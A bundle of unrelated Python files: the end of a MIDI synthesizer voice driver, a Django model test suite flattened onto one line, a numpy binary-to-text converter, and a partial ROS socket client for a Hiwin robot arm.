            set_voltage(CHANNEL_PITCH[voice],freq2voltage( (freq2-freq1)*(i/steps)+freq1,self.mbs[voice] ) )
        set_voltage(CHANNEL_PITCH[voice],freq2voltage(freq2,self.mbs[voice]))

    def stop(self, note):
        """Release the voice assigned to `note`, if any."""
        if note in self.notes_used:
            voice = self.notes_used[note]
            logger.debug("stopping {} on voice {}", note, voice)
            self.envelope[self.v2e[voice]].release(voice)
            sem.acquire()
            del self.voices_used[voice]
            del self.notes_used[note]
            sem.release()


class Keyboard:
    """Binds a named MIDI input device to a set of Voices."""

    def __init__(self, name, num_voices):
        self.num_voices = num_voices
        self.voices = Voices(self.num_voices)
        self.name = name
        # Derive a short lowercase id from the first two words of the name.
        name = name.split()
        if len(name) > 2:
            name = " ".join(name[:2])
        else:
            name = " ".join(name)
        name = name.lower()
        name = name.replace(":", "")
        self.id = name

    def tune(self,specific_voice=-1):
        self.voices.tune(specific_voice)

    def tune_specific(self,specific_voice=-1):
        self.voices.load_tuning()
        self.voices.tune_specific(specific_voice)

    def load_tuning(self):
        self.voices.load_tuning()

    def listen(self):
        # NOTE(review): iterates mido.get_output_names() but opens each as an
        # INPUT below -- presumably this should be get_input_names(); confirm.
        for name in mido.get_output_names():
            t = threading.Thread(target=self._listen, args=(name,))
            t.daemon = True
            t.start()

    def play(self,note,velocity):
        self.voices.play(note,velocity)

    def stop(self,note):
        self.voices.stop(note)

    def _listen(self,name):
        # Blocking per-port loop: translate note_on/note_off into voice calls.
        logger.info("listening to {}",name)
        with mido.open_input(name) as inport:
            for msg in inport:
                if msg.type == "note_on":
                    note_name = midi2str(msg.note)
                    logger.info(
                        f"[{name}] {note_name} {msg.type} {msg.note} {msg.velocity}"
                    )
                    # NOTE(review): 127/127 == 1.0 ignores actual velocity.
                    self.voices.play(msg.note,127/127)
                elif msg.type == "note_off":
                    note_name = midi2str(msg.note)
                    logger.info(
                        f"[{name}] {note_name} {msg.type} {msg.note} {msg.velocity}"
                    )
                    self.voices.stop(msg.note)


# Startup: zero all DAC channels, load tuning, and listen forever.
for i in range(32,40):
    set_voltage(i,0)

keys = Keyboard("monotron",4)
# keys.tune_specific()
keys.load_tuning()
keys.listen()
time.sleep(60000)
# keys.play(60)
# keys.play(61)
# keys.play(62)
# time.sleep(3)
# keys.stop(60)
# keys.stop(61)
# keys.stop(62)
# time.sleep(3)
tests.py
from __future__ import unicode_literals import threading import warnings from datetime import datetime, timedelta from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections from django.db.models.fields import Field from django.db.models.fields.related import ForeignObjectRel from django.db.models.manager import BaseManager from django.db.models.query import EmptyQuerySet, QuerySet from django.test import ( SimpleTestCase, TestCase, TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature, ) from django.utils import six from django.utils.translation import ugettext_lazy from .models import Article, ArticleSelectOnSave, SelfRef class ModelInstanceCreationTests(TestCase): def test_object_is_not_written_to_database_until_save_was_called(self): a = Article( id=None, headline='Parrot programs in Python', pub_date=datetime(2005, 7, 28), ) self.assertIsNone(a.id) self.assertEqual(Article.objects.all().count(), 0) # Save it into the database. You have to call save() explicitly. a.save() self.assertIsNotNone(a.id) self.assertEqual(Article.objects.all().count(), 1) def test_can_initialize_model_instance_using_positional_arguments(self): """ You can initialize a model instance using positional arguments, which should match the field order as defined in the model. 
""" a = Article(None, 'Second article', datetime(2005, 7, 29)) a.save() self.assertEqual(a.headline, 'Second article') self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0)) def test_can_create_instance_using_kwargs(self): a = Article( id=None, headline='Third article', pub_date=datetime(2005, 7, 30), ) a.save() self.assertEqual(a.headline, 'Third article') self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0)) def test_autofields_generate_different_values_for_each_instance(self): a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0)) a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0)) a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0)) self.assertNotEqual(a3.id, a1.id) self.assertNotEqual(a3.id, a2.id) def test_can_mix_and_match_position_and_kwargs(self): # You can also mix and match position and keyword arguments, but # be sure not to duplicate field information. a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31)) a.save() self.assertEqual(a.headline, 'Fourth article') def test_cannot_create_instance_with_invalid_kwargs(self): six.assertRaisesRegex( self, TypeError, "'foo' is an invalid keyword argument for this function", Article, id=None, headline='Some headline', pub_date=datetime(2005, 7, 31), foo='bar', ) def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self): """ You can leave off the value for an AutoField when creating an object, because it'll get filled in automatically when you save(). 
""" a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31)) a.save() self.assertEqual(a.headline, 'Article 5') self.assertNotEqual(a.id, None) def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self): a = Article(pub_date=datetime(2005, 7, 31)) a.save() self.assertEqual(a.headline, 'Default headline') def test_for_datetimefields_saves_as_much_precision_as_was_given(self): """as much precision in *seconds*""" a1 = Article( headline='Article 7', pub_date=datetime(2005, 7, 31, 12, 30), ) a1.save() self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date, datetime(2005, 7, 31, 12, 30)) a2 = Article( headline='Article 8', pub_date=datetime(2005, 7, 31, 12, 30, 45), ) a2.save() self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date, datetime(2005, 7, 31, 12, 30, 45)) def test_saving_an_object_again_does_not_create_a_new_object(self): a = Article(headline='original', pub_date=datetime(2014, 5, 16)) a.save() current_id = a.id a.save() self.assertEqual(a.id, current_id) a.headline = 'Updated headline' a.save() self.assertEqual(a.id, current_id) def test_querysets_checking_for_membership(self): headlines = [ 'Parrot programs in Python', 'Second article', 'Third article'] some_pub_date = datetime(2014, 5, 16, 12, 1) for headline in headlines: Article(headline=headline, pub_date=some_pub_date).save() a = Article(headline='Some headline', pub_date=some_pub_date) a.save() # You can use 'in' to test for membership... self.assertIn(a, Article.objects.all()) # ... 
but there will often be more efficient ways if that is all you need: self.assertTrue(Article.objects.filter(id=a.id).exists()) class ModelTest(TestCase): def test_objects_attribute_is_only_available_on_the_class_itself(self): six.assertRaisesRegex( self, AttributeError, "Manager isn't accessible via Article instances", getattr, Article(), "objects", ) self.assertFalse(hasattr(Article(), 'objects')) self.assertTrue(hasattr(Article, 'objects')) def test_queryset_delete_removes_all_items_in_that_queryset(self): headlines = [ 'An article', 'Article One', 'Amazing article', 'Boring article'] some_pub_date = datetime(2014, 5, 16, 12, 1) for headline in headlines: Article(headline=headline, pub_date=some_pub_date).save() self.assertQuerysetEqual(Article.objects.all().order_by('headline'), ["<Article: Amazing article>", "<Article: An article>", "<Article: Article One>", "<Article: Boring article>"]) Article.objects.filter(headline__startswith='A').delete() self.assertQuerysetEqual(Article.objects.all().order_by('headline'), ["<Article: Boring article>"]) def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self): some_pub_date = datetime(2014, 5, 16, 12, 1) a1 = Article.objects.create(headline='First', pub_date=some_pub_date) a2 = Article.objects.create(headline='Second', pub_date=some_pub_date) self.assertNotEqual(a1, a2) self.assertEqual(a1, Article.objects.get(id__exact=a1.id)) self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id)) @skipUnlessDBFeature('supports_microsecond_precision') def test_microsecond_precision(self): # In PostgreSQL, microsecond-level precision is available. 
a9 = Article( headline='Article 9', pub_date=datetime(2005, 7, 31, 12, 30, 45, 180), ) a9.save() self.assertEqual(Article.objects.get(pk=a9.pk).pub_date, datetime(2005, 7, 31, 12, 30, 45, 180)) @skipIfDBFeature('supports_microsecond_precision') def test_microsecond_precision_not_supported(self): # In MySQL, microsecond-level precision isn't always available. You'll # lose microsecond-level precision once the data is saved. a9 = Article( headline='Article 9', pub_date=datetime(2005, 7, 31, 12, 30, 45, 180), ) a9.save() self.assertEqual( Article.objects.get(id__exact=a9.id).pub_date, datetime(2005, 7, 31, 12, 30, 45), ) @skipIfDBFeature('supports_microsecond_precision') def test_microsecond_precision_not_supported_edge_case(self): # In MySQL, microsecond-level precision isn't always available. You'll # lose microsecond-level precision once the data is saved. a = Article.objects.create( headline='Article', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) self.assertEqual( Article.objects.get(pk=a.pk).pub_date, datetime(2008, 12, 31, 23, 59, 59), ) def test_manually_specify_primary_key(self): # You can manually specify the primary key when creating a new object. a101 = Article( id=101, headline='Article 101', pub_date=datetime(2005, 7, 31, 12, 30, 45), ) a101.save() a101 = Article.objects.get(pk=101) self.assertEqual(a101.headline, 'Article 101') def test_create_method(self): # You can create saved objects in a single step a10 = Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) self.assertEqual(Article.objects.get(headline="Article 10"), a10) def test_year_lookup_edge_case(self): # Edge-case test: A year lookup should retrieve all objects in # the given year, including Jan. 1 and Dec. 31. 
Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) self.assertQuerysetEqual(Article.objects.filter(pub_date__year=2008), ["<Article: Article 11>", "<Article: Article 12>"]) def test_unicode_data(self): # Unicode data works, too. a = Article( headline='\u6797\u539f \u3081\u3050\u307f', pub_date=datetime(2005, 7, 28), ) a.save() self.assertEqual(Article.objects.get(pk=a.id).headline, '\u6797\u539f \u3081\u3050\u307f') def test_hash_function(self): # Model instances have a hash function, so they can be used in sets # or as dictionary keys. Two models compare as equal if their primary # keys are equal. a10 = Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) a11 = Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) a12 = Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) s = {a10, a11, a12} self.assertIn(Article.objects.get(headline='Article 11'), s) def test_field_ordering(self): """ Field instances have a `__lt__` comparison function to define an ordering based on their creation. Prior to #17851 this ordering comparison relied on the now unsupported `__cmp__` and was assuming compared objects were both Field instances raising `AttributeError` when it should have returned `NotImplemented`. """ f1 = Field() f2 = Field(auto_created=True) f3 = Field() self.assertLess(f2, f1) self.assertGreater(f3, f1) self.assertIsNotNone(f1) self.assertNotIn(f2, (None, 1, '')) def test_extra_method_select_argument_with_dashes_and_values(self): # The 'select' argument to extra() supports names with dashes in # them, as long as you use values(). 
Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) dicts = Article.objects.filter( pub_date__year=2008).extra( select={'dashed-value': '1'}).values('headline', 'dashed-value') self.assertEqual([sorted(d.items()) for d in dicts], [[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]]) def test_extra_method_select_argument_with_dashes(self): # If you use 'select' with extra() and names containing dashes on a # query that's *not* a values() query, those extra 'select' values # will silently be ignored. Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) articles = Article.objects.filter( pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'}) self.assertEqual(articles[0].undashedvalue, 2) def test_create_relation_with_ugettext_lazy(self): """ Test that ugettext_lazy objects work when saving model instances through various methods. Refs #10498. 
""" notlazy = 'test' lazy = ugettext_lazy(notlazy) Article.objects.create(headline=lazy, pub_date=datetime.now()) article = Article.objects.get() self.assertEqual(article.headline, notlazy) # test that assign + save works with Promise objects article.headline = lazy article.save() self.assertEqual(article.headline, notlazy) # test .update() Article.objects.update(headline=lazy) article = Article.objects.get() self.assertEqual(article.headline, notlazy) # still test bulk_create() Article.objects.all().delete() Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())]) article = Article.objects.get() self.assertEqual(article.headline, notlazy) def test_emptyqs(self): # Can't be instantiated with self.assertRaises(TypeError): EmptyQuerySet() self.assertIsInstance(Article.objects.none(), EmptyQuerySet) def test_emptyqs_values(self): # test for #15959 Article.objects.create(headline='foo', pub_date=datetime.now()) with self.assertNumQueries(0): qs = Article.objects.none().values_list('pk') self.assertIsInstance(qs, EmptyQuerySet) self.assertEqual(len(qs), 0) def test_emptyqs_customqs(self): # A hacky test for custom QuerySet subclass - refs #17271 Article.objects.create(headline='foo', pub_date=datetime.now()) class CustomQuerySet(QuerySet): def do_something(self): return 'did something' qs = Article.objects.all() qs.__class__ = CustomQuerySet qs = qs.none() with self.assertNumQueries(0): self.assertEqual(len(qs), 0) self.assertIsInstance(qs, EmptyQuerySet) self.assertEqual(qs.do_something(), 'did something') def test_emptyqs_values_order(self): # Tests for ticket #17712 Article.objects.create(headline='foo', pub_date=datetime.now()) with self.assertNumQueries(0): self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0) with self.assertNumQueries(0): self.assertEqual(len(Article.objects.none().filter( id__in=Article.objects.values_list('id', flat=True))), 0) @skipUnlessDBFeature('can_distinct_on_fields') def 
test_emptyqs_distinct(self): # Tests for #19426 Article.objects.create(headline='foo', pub_date=datetime.now()) with self.assertNumQueries(0): self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0) def test_ticket_20278(self): sr = SelfRef.objects.create() with self.assertRaises(ObjectDoesNotExist): SelfRef.objects.get(selfref=sr) def test_eq(self): self.assertEqual(Article(id=1), Article(id=1)) self.assertNotEqual(Article(id=1), object()) self.assertNotEqual(object(), Article(id=1)) a = Article() self.assertEqual(a, a) self.assertNotEqual(Article(), a) def test_hash(self): # Value based on PK self.assertEqual(hash(Article(id=1)), hash(1)) with self.assertRaises(TypeError): # No PK value -> unhashable (because save() would then change # hash) hash(Article()) class ModelLookupTest(TestCase): def setUp(self): # Create an Article. self.a = Article( id=None, headline='Swallow programs in Python', pub_date=datetime(2005, 7, 28), ) # Save it into the database. You have to call save() explicitly. self.a.save() def test_all_lookup(self): # Change values by changing the attributes, then calling save(). self.a.headline = 'Parrot programs in Python' self.a.save() # Article.objects.all() returns all the articles in the database. self.assertQuerysetEqual(Article.objects.all(), ['<Article: Parrot programs in Python>']) def test_rich_lookup(self): # Django provides a rich database lookup API. self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a) self.assertEqual(Article.objects.get(headline__startswith='Swallow'), self.a) self.assertEqual(Article.objects.get(pub_date__year=2005), self.a) self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a) self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a) self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a) def test_equal_lookup(self): # The "__exact" lookup type can be omitted, as a shortcut. 
self.assertEqual(Article.objects.get(id=self.a.id), self.a) self.assertEqual(Article.objects.get(headline='Swallow programs in Python'), self.a) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2005), ['<Article: Swallow programs in Python>'], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2004), [], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2005, pub_date__month=7), ['<Article: Swallow programs in Python>'], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__week_day=5), ['<Article: Swallow programs in Python>'], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__week_day=6), [], ) def test_does_not_exist(self): # Django raises an Article.DoesNotExist exception for get() if the # parameters don't match any object. six.assertRaisesRegex( self, ObjectDoesNotExist, "Article matching query does not exist.", Article.objects.get, id__exact=2000, ) # To avoid dict-ordering related errors check only one lookup # in single assert. self.assertRaises( ObjectDoesNotExist, Article.objects.get, pub_date__year=2005, pub_date__month=8, ) six.assertRaisesRegex( self, ObjectDoesNotExist, "Article matching query does not exist.", Article.objects.get, pub_date__week_day=6, ) def test_lookup_by_primary_key(self): # Lookup by a primary key is the most common case, so Django # provides a shortcut for primary-key exact lookups. # The following is identical to articles.get(id=a.id). self.assertEqual(Article.objects.get(pk=self.a.id), self.a) # pk can be used as a shortcut for the primary key name in any query. self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]), ["<Article: Swallow programs in Python>"]) # Model instances of the same type and same ID are considered equal. 
a = Article.objects.get(pk=self.a.id) b = Article.objects.get(pk=self.a.id) self.assertEqual(a, b) def test_too_many(self): # Create a very similar object a = Article( id=None, headline='Swallow bites Python', pub_date=datetime(2005, 7, 28), ) a.save() self.assertEqual(Article.objects.count(), 2) # Django raises an Article.MultipleObjectsReturned exception if the # lookup matches more than one object six.assertRaisesRegex( self, MultipleObjectsReturned, "get\(\) returned more than one Article -- it returned 2!", Article.objects.get, headline__startswith='Swallow', ) six.assertRaisesRegex( self, MultipleObjectsReturned, "get\(\) returned more than one Article -- it returned 2!", Article.objects.get, pub_date__year=2005, ) six.assertRaisesRegex( self, MultipleObjectsReturned, "get\(\) returned more than one Article -- it returned 2!", Article.objects.get, pub_date__year=2005, pub_date__month=7, ) class ConcurrentSaveTests(TransactionTestCase): available_apps = ['basic'] @skipUnlessDBFeature('test_db_allows_multiple_connections') def test_concurrent_delete_with_save(self): """ Test fetching, deleting and finally saving an object - we should get an insert in this case. """ a = Article.objects.create(headline='foo', pub_date=datetime.now()) exceptions = [] def deleter(): try: # Do not delete a directly - doing so alters its state. 
Article.objects.filter(pk=a.pk).delete() except Exception as e: exceptions.append(e) finally: connections[DEFAULT_DB_ALIAS].close() self.assertEqual(len(exceptions), 0) t = threading.Thread(target=deleter) t.start() t.join() a.save() self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo') class ManagerTest(SimpleTestCase): QUERYSET_PROXY_METHODS = [ 'none', 'count', 'dates', 'datetimes', 'distinct', 'extra', 'get', 'get_or_create', 'update_or_create', 'create', 'bulk_create', 'filter', 'aggregate', 'annotate', 'complex_filter', 'exclude', 'in_bulk', 'iterator', 'earliest', 'latest', 'first', 'last', 'order_by', 'select_for_update', 'select_related', 'prefetch_related', 'values', 'values_list', 'update', 'reverse', 'defer', 'only', 'using', 'exists', '_insert', '_update', 'raw', ] def test_manager_methods(self): """ This test ensures that the correct set of methods from `QuerySet` are copied onto `Manager`. It's particularly useful to prevent accidentally leaking new methods into `Manager`. New `QuerySet` methods that should also be copied onto `Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`. """ self.assertEqual( sorted(BaseManager._get_queryset_methods(QuerySet).keys()), sorted(self.QUERYSET_PROXY_METHODS), ) class SelectOnSaveTests(TestCase): def test_select_on_save(self): a1 = Article.objects.create(pub_date=datetime.now()) with self.assertNumQueries(1): a1.save() asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now()) with self.assertNumQueries(2): asos.save() with self.assertNumQueries(1): asos.save(force_update=True) Article.objects.all().delete() with self.assertRaises(DatabaseError): with self.assertNumQueries(1): asos.save(force_update=True) def test_select_on_save_lying_update(self): """ Test that select_on_save works correctly if the database doesn't return correct information about matched rows from UPDATE. """ # Change the manager to not return "row matched" for update(). 
# We are going to change the Article's _base_manager class # dynamically. This is a bit of a hack, but it seems hard to # test this properly otherwise. Article's manager, because # proxy models use their parent model's _base_manager. orig_class = Article._base_manager.__class__ class FakeQuerySet(QuerySet): # Make sure the _update method below is in fact called. called = False def _update(self, *args, **kwargs): FakeQuerySet.called = True super(FakeQuerySet, self)._update(*args, **kwargs) return 0 class FakeManager(orig_class): def get_queryset(self): return FakeQuerySet(self.model) try: Article._base_manager.__class__ = FakeManager asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now()) with self.assertNumQueries(3): asos.save() self.assertTrue(FakeQuerySet.called) # This is not wanted behavior, but this is how Django has always # behaved for databases that do not return correct information # about matched rows for UPDATE. with self.assertRaises(DatabaseError): asos.save(force_update=True) with self.assertRaises(DatabaseError): asos.save(update_fields=['pub_date']) finally: Article._base_manager.__class__ = orig_class class ModelRefreshTests(TestCase): def _truncate_ms(self, val): # MySQL < 5.6.4 removes microseconds from the datetimes which can cause # problems when comparing the original value to that loaded from DB return val - timedelta(microseconds=val.microsecond) def test_refresh(self): a = Article.objects.create(pub_date=self._truncate_ms(datetime.now())) Article.objects.create(pub_date=self._truncate_ms(datetime.now())) Article.objects.filter(pk=a.pk).update(headline='new headline') with self.assertNumQueries(1): a.refresh_from_db() self.assertEqual(a.headline, 'new headline') orig_pub_date = a.pub_date new_pub_date = a.pub_date + timedelta(10) Article.objects.update(headline='new headline 2', pub_date=new_pub_date) with self.assertNumQueries(1): a.refresh_from_db(fields=['headline']) self.assertEqual(a.headline, 'new headline 2') 
self.assertEqual(a.pub_date, orig_pub_date) with self.assertNumQueries(1): a.refresh_from_db() self.assertEqual(a.pub_date, new_pub_date) def test_refresh_fk(self): s1 = SelfRef.objects.create() s2 = SelfRef.objects.create() s3 = SelfRef.objects.create(selfref=s1) s3_copy = SelfRef.objects.get(pk=s3.pk) s3_copy.selfref.touched = True s3.selfref = s2 s3.save() with self.assertNumQueries(1): s3_copy.refresh_from_db() with self.assertNumQueries(1): # The old related instance was thrown away (the selfref_id has # changed). It needs to be reloaded on access, so one query # executed. self.assertFalse(hasattr(s3_copy.selfref, 'touched')) self.assertEqual(s3_copy.selfref, s2) def test_refresh_null_fk(self): s1 = SelfRef.objects.create() s2 = SelfRef.objects.create(selfref=s1) s2.selfref = None s2.refresh_from_db() self.assertEqual(s2.selfref, s1) def test_refresh_unsaved(self): pub_date = self._truncate_ms(datetime.now()) a = Article.objects.create(pub_date=pub_date) a2 = Article(id=a.pk) with self.assertNumQueries(1): a2.refresh_from_db() self.assertEqual(a2.pub_date, pub_date) self.assertEqual(a2._state.db, "default") def test_refresh_fk_on_delete_set_null(self): a = Article.objects.create( headline='Parrot programs in Python', pub_date=datetime(2005, 7, 28), ) s1 = SelfRef.objects.create(article=a) a.delete() s1.refresh_from_db() self.assertIsNone(s1.article_id) self.assertIsNone(s1.article) def test_refresh_no_fields(self): a = Article.objects.create(pub_date=self._truncate_ms(datetime.now())) with self.assertNumQueries(0): a.refresh_from_db(fields=[]) class TestRelatedObjectDeprecation(SimpleTestCase): def test_field_related_deprecation(self): field = SelfRef._meta.get_field('selfref') with warnings.catch_warnings(record=True) as warns: warnings.simplefilter('always') self.assertIsInstance(field.related, ForeignObjectRel) self.assertEqual(len(warns), 1) self.assertEqual( str(warns.pop().message), 'Usage of field.related has been deprecated. 
Use field.remote_field instead.' )
# ===== bintotxt.py =====
import os
import numpy as np
import sys
from multiprocessing import Process
import time
import subprocess

# Accepted dtype keywords mapped to the numpy dtypes used for decoding.
_DTYPES = {
    "fp32": np.float32,
    "fp16": np.float16,
    "int32": np.int32,
    "int8": np.int8,
}


def bin2float(file, dtype):
    """Convert one raw ``.bin`` file to a one-value-per-line text file.

    The output is written next to the input as ``<file>.txt`` with six
    decimal places per value.

    file  -- path to the input; silently ignored unless it ends in ".bin"
             (preserves the original behavior for non-.bin entries).
    dtype -- one of "fp32", "fp16", "int32", "int8".

    Returns 0 on an unknown dtype (kept for backward compatibility with the
    original error path), otherwise None.
    """
    if not file.endswith(".bin"):
        return
    np_dtype = _DTYPES.get(dtype)
    if np_dtype is None:
        print("Input dtype error!")
        return 0
    data = np.fromfile(file, dtype=np_dtype)
    float_file = file + ".txt"
    print("save the file: " + float_file)
    np.savetxt(float_file, data.reshape(-1, 1), fmt='%.6f')


def bintofloat(filename, dtype):
    """Convert a single file, or every file in a directory.

    Directory entries are converted in parallel, one worker process each,
    and all workers are joined before returning.
    """
    if os.path.isdir(filename):
        processes = []
        for entry in os.listdir(filename):
            # os.path.join fixes the original "filename+file" concatenation,
            # which produced a broken path unless the directory argument
            # already ended with a path separator. (os.listdir never yields
            # "." or "..", so the original check for them was dead code.)
            p = Process(target=bin2float,
                        args=(os.path.join(filename, entry), dtype))
            p.start()
            processes.append(p)
        # Join so all outputs exist (and errors surface) before we return.
        for p in processes:
            p.join()
    else:
        bin2float(filename, dtype)


if __name__ == "__main__":
    # NOTE(review): this runs "ulimit" in a throw-away child shell, so it
    # does NOT raise the open-file limit of this process; kept only to
    # preserve the original behavior.
    subprocess.run("ulimit -n 65535", shell=True, cwd="./")
    if len(sys.argv) < 3:
        sys.exit("usage: bintotxt.py <file-or-dir> <fp32|fp16|int32|int8>")
    print("params: " + sys.argv[1] + "," + sys.argv[2])
    bintofloat(sys.argv[1], sys.argv[2])
# ===== HiwinRA605_socket_ros_test_20190626131757.py =====
#!/usr/bin/env python3
# license removed for brevity
# Receives commands from the strategy side and forwards them over a TCP
# socket to the control-side (arm controller) computer.
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum

# Module-level shared state, read and written from both the ROS service
# callbacks and the socket-client thread.
Socket = 0           # replaced by the TCP socket object in socket_client()
data = '0'           # initial value of the transmit payload
Arm_feedback = 1     # assume the arm is busy at start-up
state_feedback = 0
NAME = 'socket_server'
client_response = 0  # initial value of the reply counter
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False

##------------class pos-------
class point():
    # Mutable holder for an arm pose (position + orientation).
    def __init__(self, x, y, z, pitch, roll, yaw):
        self.x = x
        self.y = y
        self.z = z
        self.pitch = pitch
        self.roll = roll
        self.yaw = yaw

# Current target pose; mutated in place by the point_data() callback.
pos = point(0,36.8,11.35,-90,0,0)

##------------class socket_cmd---------
class socket_cmd():
    # Holder for the current arm command.
    # NOTE(review): this class is never instantiated — the callbacks assign
    # *class* attributes (socket_cmd.action = ...), so __init__ is dead code
    # and the class serves as a mutable namespace.
    def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
        self.grip = grip
        self.setvel = setvel
        self.ra = ra
        self.delay = delay
        self.setboth = setboth
        self.action = action
        self.Speedmode = Speedmode

##-----------switch define------------##
class switch(object):
    # C-style switch/case emulation (the classic ActiveState recipe).
    # NOTE(review): `raise StopIteration` inside a generator becomes a
    # RuntimeError under PEP 479 (Python 3.7+); the py3-safe spelling is a
    # plain `return`. Left unchanged — confirm the target interpreter.
    def __init__(self, value):
        self.value = value
        self.fall = False

    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
        raise StopIteration

    def match(self, *args):
        """Indicate whether or not to enter a case suite"""
        if self.fall or not args:
            return True
        elif self.value in args:  # changed for v1.5, see below
            self.fall = True
            return True
        else:
            return False

##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
    """Report the arm's busy/ready state to the 'arm_state' ROS service."""
    global state_feedback
    rospy.wait_for_service('arm_state')
    try:
        Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
        state_feedback = Arm_state_client(Arm_state)
        #pos_feedback_times = pos_feedback.response
        return state_feedback
    except rospy.ServiceException as e:
        print ("Service call failed: %s"%e)

##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
    """Report the send-acknowledge flag to the 'sent_flag' ROS service."""
    # NOTE(review): `sent_feedback` is declared global but never initialized
    # at module level; it only exists after this function first succeeds.
    global sent_feedback
    rospy.wait_for_service('sent_flag')
    try:
        Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
        sent_feedback = Sent_flag_client(Sent_flag)
        #pos_feedback_times = pos_feedback.response
        return sent_feedback
    except rospy.ServiceException as e:
        print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------

##------------server side-------
def point_data(req):  ## receives the pose data sent by the strategy side
    # NOTE(review): the pose fields are stored as *strings* ('%s' % req.x);
    # downstream TCP.SetPtoP/SetLine apparently accept that — confirm.
    global client_response,point_data_flag
    pos.x = '%s'%req.x
    pos.y = '%s'%req.y
    pos.z = '%s'%req.z
    pos.pitch = '%s'%req.pitch
    pos.roll = '%s'%req.roll
    pos.yaw = '%s'%req.yaw
    point_data_flag = True
    client_response = client_response + 1
    #Socket_command()
    return(client_response)

##----------Arm Mode-------------###
def Arm_Mode(req):  ## receives the arm-mode data sent by the strategy side
    # Stores the command fields on the socket_cmd namespace, then immediately
    # forwards the assembled command to the controller via Socket_command().
    global arm_mode_flag
    socket_cmd.action = int('%s'%req.action)
    socket_cmd.grip = int('%s'%req.grip)
    socket_cmd.ra = int('%s'%req.ra)
    socket_cmd.setvel = int('%s'%req.vel)
    socket_cmd.setboth = int('%s'%req.both)
    arm_mode_flag = True
    Socket_command()
    print("cmd")
    return(1)

##-------Arm Speed Mode------------###
def Speed_Mode(req):  ## receives the speed-mode data sent by the strategy side
    global speed_mode_flag
    socket_cmd.Speedmode = int('%s'%req.Speedmode)
    speed_mode_flag = True
    #Socket_command()
    return(1)

# def Grip_Mode(req):  ## receives the gripper-action data sent by the strategy side
#     socket_cmd.grip = int('%s'%req.grip)
#     return(1)

def socket_server():  ## create the server node
    """Register the ROS services and spin until shutdown."""
    rospy.init_node(NAME)
    a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
    s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
    b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
    #c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
    print ("Ready to connect")
    rospy.spin() ## spin one
##------------server side end-------

##----------socket packet transmission--------------##
##---------------send arm command over the socket-----------------
def Socket_command():
    """Assemble the TCP command string for the current socket_cmd state and
    send it to the arm controller.

    NOTE(review): the inner `for case in switch(...)` loops shadow the outer
